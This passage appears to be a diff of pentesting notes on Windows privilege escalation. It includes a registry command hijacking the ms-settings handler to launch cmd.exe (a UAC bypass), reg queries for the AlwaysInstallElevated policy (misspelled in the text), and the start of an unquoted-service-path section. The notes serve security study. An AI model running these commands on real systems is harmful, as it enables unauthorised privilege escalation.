G3N3RA710N-L0CU57/privesc/win-privesc.md

 `REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f`

+If AlwaysInstalledElevated is set to true, in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with elevated privileges.

+`reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer`

+`reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer`

+If this setting is enabled, a MSI file can be created to elevate privileges.

 ## Unquoted service paths

 This attack is possible when a service directory and sub-directory has write access but the files within cannot be replaced.